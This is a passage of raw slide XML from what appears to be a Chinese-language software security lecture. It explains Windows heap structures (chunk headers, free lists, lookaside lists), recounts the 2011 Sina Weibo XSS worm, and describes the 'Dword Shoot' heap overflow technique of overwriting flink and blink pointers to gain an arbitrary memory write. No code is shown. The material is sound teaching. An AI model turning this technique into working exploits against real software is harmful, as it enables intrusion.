                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
                        <a:t>由内存高地址向低地址增加</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91442" marR="91442" marT="45714" marB="45714"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1679514067"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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堆的结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655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堆块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆区以堆块为单位进行标识</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>块首：一个堆块头部的几个字节，用来标识这个堆块自身的信息，例如本块的大小，是否空闲等信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>块身：紧跟在块首后面的部分，也是最终分配给用户使用的数据区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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5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堆表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一般位于堆区的起始位置，用于索引堆区中所有堆块的重要信息，包括堆块的位置、大小、空闲状态等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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堆块信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1898650"/>
            <a:ext cx="1368425" cy="51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占有态堆块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2708275"/>
            <a:ext cx="1008063"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Self Size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617663" y="2708275"/>
            <a:ext cx="1638300"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Previous Chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260725" y="2708275"/>
            <a:ext cx="1008063"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Segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Index</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4273550" y="2708275"/>
            <a:ext cx="1008063"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Flags</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292725" y="2708275"/>
            <a:ext cx="1008063"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Unused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bytes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310313" y="2708275"/>
            <a:ext cx="1500187"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Tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3500438"/>
            <a:ext cx="7200900" cy="20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Data</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7932738" y="2919413"/>
            <a:ext cx="711200" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>块首</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7978775" y="4365625"/>
            <a:ext cx="709613" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>块身</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7885113" y="2708275"/>
            <a:ext cx="75882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直接连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7885113" y="3500438"/>
            <a:ext cx="75882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直接连接符 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7885113" y="5510213"/>
            <a:ext cx="75882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矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6442075" y="1898650"/>
            <a:ext cx="1368425" cy="51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空闲态堆块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604838" y="3498850"/>
            <a:ext cx="3663950"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t>Flink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（前向指针）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4273550" y="3498850"/>
            <a:ext cx="3536950" cy="792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Blink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（后向指针）</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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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arn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="16" presetClass="entr" presetSubtype="21"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par>
                                <p:cTn id="40" presetID="16" presetClass="entr" presetSubtype="21"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par>
                                <p:cTn id="43" presetID="16" presetClass="entr" presetSubtype="21"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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="click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par>
                                <p:cTn id="61" presetID="2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down)">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>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down)">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8" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="1" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="2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堆表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686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块表位于堆区的起始位置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用于索引堆区中所有堆块的信息，决定整个堆区的组织方式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆表包括空表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>freelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）和快表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lookasid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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空表数据结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716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pic>
        <p:nvPicPr>
          <p:cNvPr id="71684" name="Picture 2" descr="在这里插入图片描述"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1196975"/>
            <a:ext cx="7993063" cy="5210175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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堆表特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727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空闲堆块的大小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>索引项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>*8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（字节）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>free[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标识的空表比较特殊，这条双向链表链入了所有大于等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节且小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>512K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节的堆块，以升序排列</a:t>
            </a:r>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快表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用来加速堆块分配而采用的一种堆表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>块表也有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>挑，组织结构与空表类似，只是按单链表组织，块表总是初始化为空</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其中的空闲块块首被设置为占用态，不会发生堆块合并</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利用软件漏洞攻击的实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9220" name="矩形 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="804863" y="4030663"/>
            <a:ext cx="7080250" cy="1662112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚本漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户将代码植入到提供给其它用户使用的页面中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9221" name="矩形 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1341438"/>
            <a:ext cx="3617913" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年新浪微博病毒事件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9222" name="矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="1989138"/>
            <a:ext cx="7561262" cy="1816100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>日，新浪微博突然出现大范围“中毒”，病毒利用新浪微博系统漏洞，向中毒者好友大量发送私信，并在内容内加上流行词汇，进行快速传播。</a:t>
            </a:r>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堆溢出的利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7475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基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>堆的三类操作：堆块分配、堆块释放和堆块合并，就是堆空表链的修改</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果能够修改链表节点的指针，在“卸下”和“链入”的过程中就有可能获得一次读写内存的机会</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Dword Shoot</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757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攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用精心构造的数据去溢出覆盖下一个堆块的块首，使其改写块首中的前向指针（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>flink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）和后向指针（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>blink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），然后在分配、释放、合并等操作发生时伺机获得一次向内存任意地址写入任意数据的机会</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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堆溢出原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768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思考</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出覆盖节点块身的前八个字节，即前后向指针时，如果在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>flink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里面放入的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节的任意恶意数据内容，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>blink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>里面放入的是目标地址，会出现什么情况？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76804" name="Picture 2" descr="在这里插入图片描述"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
